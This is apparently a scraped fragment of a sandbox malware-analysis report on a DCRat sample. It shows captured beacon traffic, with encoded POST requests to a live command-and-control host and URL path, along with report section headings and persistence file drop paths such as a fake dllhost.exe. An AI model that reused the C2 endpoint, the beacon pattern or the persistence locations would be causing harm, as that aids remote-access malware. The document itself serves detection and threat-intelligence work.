Dec 21, 2024 11:07:51.175580025 CET	960	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ANTsj9SxXwWY7LTTewfmnnI02vExvKiy75aal9OWmQMSdr8vg9Tyoaue0170JobZopc6z2C2C1ARLY0ABnkKhw57rN7%2FIpKuhtYOu1Vm0ItrrZlv90xWr64rhH0JoUShSqJU45X1sXE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f571144f90843dc-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3973&min_rtt=1576&rtt_var=4463&sent=92&recv=261&lost=0&retrans=0&sent_bytes=859&recv_bytes=252052&delivery_rate=1791411&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0f 13 39 10 33 38 32 58 3d 29 3f 10 29 3c 03 54 2b 3c 3a 5f 2c 54 32 03 25 30 34 1c 2c 12 29 19 3e 33 21 59 28 5b 38 54 28 19 24 01 3e 38 2e 58 03 11 27 07 22 39 34 06 29 38 08 0a 2e 01 35 17 37 2d 24 05 3a 5e 2e 09 25 10 0b 0e 36 5c 33 55 3b 31 3c 54 2d 39 0a 06 32 24 20 0f 26 2e 2e 53 0c 16 22 5d 29 3d 29 5a 27 3c 21 56 30 0e 25 0d 36 08 30 57 20 28 0e 1b 33 5a 2e 10 24 3e 0e 1c 2b 56 25 55 3c 06 21 1d 3c 04 39 14 3f 11 26 55 2e 01 22 53 04 3d 5a 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 989382X=)?)<T+<:_,T2%04,)>3!Y([8T($>8.X'"94)8.57-$:^.%6\3U;1<T-92$ &..S"])=)Z'<!V0%60W (3Z.$>+V%U<!<9?&U."S=ZP0

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:47.673227072 CET	303	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 2292 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 11:07:48.025295019 CET	2292	OUT	Data Raw: 59 5c 43 5e 5a 5c 55 5f 54 5d 59 5a 55 5f 57 51 56 50 5c 55 52 5f 5b 56 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: Y\C^Z\U_T]YZU_WQVP\UR_[VYRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\"=[.^?(X?E("26) ?(0+;<5^'2'[$.Y!
Dec 21, 2024 11:07:48.763365030 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:49.000579119 CET	810	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BYFhU9K1Sh%2Bnr2qxW32eEMNQbTbB8YqOlsAa6LD1zn8OW28X3QKDO1%2FXzVB2fsj2EK9SIdfrrCUiUz0wRXEEWtKuyuNomj4yGqdz8QRsMUrgXV4YPX%2FTCQ5Etn6sfMCUG62kc1Qj2o8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f571138bb4e439f-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=8464&min_rtt=1561&rtt_var=14392&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2595&delivery_rate=25708&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3d 5b 40 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4=[@W0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 6G8OR42xrB.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\86503de627f43d

C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\roKDGeHYZcczQzeuqXqYGYyw.exe

C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\roKDGeHYZcczQzeuqXqYGYyw.exe:Zone.Identifier

C:\Recovery\86503de627f43d

C:\Recovery\roKDGeHYZcczQzeuqXqYGYyw.exe

C:\Recovery\roKDGeHYZcczQzeuqXqYGYyw.exe:Zone.Identifier

C:\Users\Default\5940a34987c991

C:\Users\Default\dllhost.exe

C:\Users\Default\dllhost.exe:Zone.Identifier

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\6G8OR42xrB.exe.log

C:\Users\user\AppData\Local\Temp\09JXV2dyHb

Windows Analysis Report
6G8OR42xrB.exe

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:49.249229908 CET	279	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 2280 Expect: 100-continue
Dec 21, 2024 11:07:49.603387117 CET	2280	OUT	Data Raw: 5c 5b 43 5a 5a 59 50 59 54 5d 59 5a 55 58 57 56 56 5c 5c 5d 52 5f 5b 5b 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: \[CZZYPYT]YZUXWVV\\]R_[[YRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!*>>_??,?+-[$(.>9?_+.Q+3 +8(^#8'='[$.Y!3
Dec 21, 2024 11:07:50.335457087 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:50.580302000 CET	806	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9fRdAyU5yhCZ0cv5Jf1DQbNJcz2Or3AdWK7HN3fiisbTQ0XNog0XTKY7Uv7MtZZTqX9sjkr32ECyLa6CyBVUQtKH3MvfH8GkFgX%2BVNAsWpc2spDVMc0%2FRZMOu39lqFQFzpNp9QwpR48%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5711429b167295-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3340&min_rtt=1957&rtt_var=3501&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2559&delivery_rate=112066&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3d 5b 40 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4=[@W0

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:50.817145109 CET	279	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 2292 Expect: 100-continue
Dec 21, 2024 11:07:51.165973902 CET	2292	OUT	Data Raw: 59 5a 43 53 5a 5d 50 5e 54 5d 59 5a 55 5e 57 53 56 50 5c 58 52 5f 5b 5f 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: YZCSZ]P^T]YZU^WSVP\XR_[_YRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!+.>_?Z0S+.,??1%&)\3[(X!(#,Q(+!<&-'[$.Y!;
Dec 21, 2024 11:07:51.907506943 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:52.142950058 CET	815	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D2X%2FiVehzDgv%2B%2BUu3U%2B0pbSGYyAQ4D%2BoO8LWAJ7pxf7wwHu1lOKlHGd7gfF%2B3E69ONqfzkemblPKc0FG04Piu6snJQFUJnQlnA5sEG1w%2B0nMqDqcCvjBAPIsMo3zzJ6kcWQH9klPFW4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57114c6b844411-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3871&min_rtt=1703&rtt_var=4975&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2571&delivery_rate=76640&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3d 5b 40 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4=[@W0

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:52.375047922 CET	279	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 2292 Expect: 100-continue
Dec 21, 2024 11:07:52.728542089 CET	2292	OUT	Data Raw: 59 59 43 52 5a 59 55 59 54 5d 59 5a 55 5a 57 53 56 5a 5c 58 52 52 5b 5e 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: YYCRZYUYT]YZUZWSVZ\XRR[^YRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!A>.._>?0>=;@)/=1;)=:+-9Q?#(?;<^"(3T'='[$.Y!+
Dec 21, 2024 11:07:53.461100101 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:53.705221891 CET	806	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TDtygA0KdvaASAkmm7AO3j%2FWR53SprSKe7cQ6fkTjgk7kK7MJkO4O9ZLXz5ycRulsihJaNYL5XBi9DtSVg%2FSj7UrL8ztlQO8BruUmSZ0ssAYkmZmZDz8tAs4NdYNIzidNwK3ERMnXpw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5711562ad6c356-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=6897&min_rtt=1701&rtt_var=11031&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2571&delivery_rate=33738&cwnd=152&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3d 5b 40 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4=[@W0

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:53.937388897 CET	303	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 2292 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 11:07:54.290924072 CET	2292	OUT	Data Raw: 59 58 46 5f 5f 5a 50 5e 54 5d 59 5a 55 5b 57 5e 56 5c 5c 5f 52 52 5b 57 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: YXF__ZP^T]YZU[W^V\\_RR[WYRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!=1<<R<+<=]$8!U*(U?+8X5^72-'[$.Y!/
Dec 21, 2024 11:07:55.022525072 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:55.269313097 CET	810	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XkWVKsW9%2B4ScY3vuaj8hbkClQgJHz098czSYk5Rji1L76cbD0EA8IZecN34yN42GLzJBi%2B759OEZYaPzUL%2B5QAcRx%2BNWQbnXlSknPVXI7mPB7XI62iZqgiA8fAtCeZBBlY0b3kUpNSA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57115fee8143d7-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3014&min_rtt=1595&rtt_var=3437&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2595&delivery_rate=112723&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3d 5b 40 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4=[@W0

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:55.518980026 CET	303	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 2292 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 11:07:55.869184971 CET	2292	OUT	Data Raw: 5c 58 46 5e 5a 5d 55 58 54 5d 59 5a 55 5c 57 57 56 5c 5c 5b 52 5e 5b 5e 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: \XF^Z]UXT]YZU\WWV\\[R^[^YRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!@>->< <0(118%U)*[+V?++7"+<2'[$.Y!3

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:56.303594112 CET	303	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 1732 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 11:07:56.650331020 CET	1732	OUT	Data Raw: 59 5a 43 5b 5a 5c 50 53 54 5d 59 5a 55 5b 57 5e 56 58 5c 54 52 55 5b 57 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: YZC[Z\PST]YZU[W^VX\TRU[WYRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!)[.Y<?/<>D)/=Y&&>;Z?>!T( 3((+!;#1'[$.Y!/
Dec 21, 2024 11:07:57.389664888 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:57.626220942 CET	958	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5Hjlik0NKTVOQ8uTsJaWzQkGVE0aQw%2FdJKFZveMnyWOtCgx337xrwbYp0YflV1XBgh3YTbLmpcBVdP9BiFfZnmoF8hJyDRdpk3%2B%2BUTjs8Xd%2BA8xDksxycoyALjE8nIPTTnOaWCBfRl0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57116eae344346-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4813&min_rtt=2338&rtt_var=5827&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2035&delivery_rate=65941&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0f 13 39 10 30 38 3a 5b 3e 3a 3b 5a 28 3c 21 1c 28 2f 36 5c 3b 21 2d 17 33 33 3c 5a 38 3f 3a 0d 3e 20 32 07 2b 13 2f 0f 28 37 05 1f 2a 38 2e 58 03 11 24 12 35 3a 02 06 3c 06 07 54 2e 3b 39 5b 37 3d 27 16 2c 38 29 57 32 00 25 0a 22 2a 09 1f 2c 0f 02 57 2d 29 05 58 26 09 0e 0c 24 3e 2e 53 0c 16 21 04 29 3d 3d 1f 25 01 0b 10 25 24 3d 0e 21 36 3c 52 21 06 09 09 27 02 2a 12 27 2d 27 0c 3c 09 29 1c 2b 59 31 1d 28 04 35 56 2b 01 26 55 2e 01 22 53 04 3d 5a 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98908:[>:;Z(<!(/6\;!-33<Z8?:> 2+/(78.X$5:<T.;9[7=',8)W2%",W-)X&$>.S!)==%%$=!6<R!'*'-'<)+Y1(5V+&U."S=ZP0

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:56.455538988 CET	303	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 2292 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 11:07:56.806493998 CET	2292	OUT	Data Raw: 59 5d 43 52 5a 5b 50 5c 54 5d 59 5a 55 5c 57 52 56 5b 5c 5f 52 51 5b 59 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: Y]CRZ[P\T]YZU\WRV[\_RQ[YYRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!A*-6]<,'>=/D?%2^=P>)0)=:+34U+#(?U1'[$.Y!3
Dec 21, 2024 11:07:57.541794062 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:57.777484894 CET	816	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rZqMPCEjb%2B1fcsJt%2FmSDKyvdQ8jvMQiAhUl0g67jlZepTLo2aGx%2BM3lVWso0KDQ%2FkL9Gt%2BUSLFO8%2BBerc6C8joRSrYJHNptBAjlI6nRZ%2BZI2Xlq9yik3CVyyj4igp8TOtuRxVNqH4Zg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57116fa92872b6-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=8785&min_rtt=1975&rtt_var=14362&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2595&delivery_rate=25858&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3d 5b 40 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4=[@W0

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:58.207902908 CET	279	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 2292 Expect: 100-continue
Dec 21, 2024 11:07:58.556545019 CET	2292	OUT	Data Raw: 59 5b 43 5e 5f 5d 55 5d 54 5d 59 5a 55 51 57 53 56 5b 5c 54 52 5f 5b 59 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: Y[C^_]U]T]YZUQWSV[\TR_[YYRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!D>>.](+>(?<=\&-T+9<?=.<3(+];584&'[$.Y!
Dec 21, 2024 11:07:59.289527893 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:59.538341045 CET	804	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wa9BWKBUUceYC0xVFBb%2F476996WqwjScj1QxAthqtgRIw8ZW9uB5IQEoBVPGWebVlIISp3SfL0ezyjJYsbyAPAG7x4XzXUlv0k4vn77LukLU110TBizfSjmVTKJAhHIiMP0sO74mlS0%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57117a89af42c2-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=2863&min_rtt=1611&rtt_var=3108&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2571&delivery_rate=125558&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3d 5b 40 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4=[@W0

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:59.784090996 CET	303	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 2292 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 11:08:00.134748936 CET	2292	OUT	Data Raw: 59 5a 43 5a 5a 56 55 5d 54 5d 59 5a 55 5d 57 50 56 59 5c 5c 52 55 5b 5f 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: YZCZZVU]T]YZU]WPVY\\RU[_YRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\")->+<W<D+?5]18)9'+--Q+ (P<452'[$.Y!7
Dec 21, 2024 11:08:00.874757051 CET	25	IN	HTTP/1.1 100 Continue
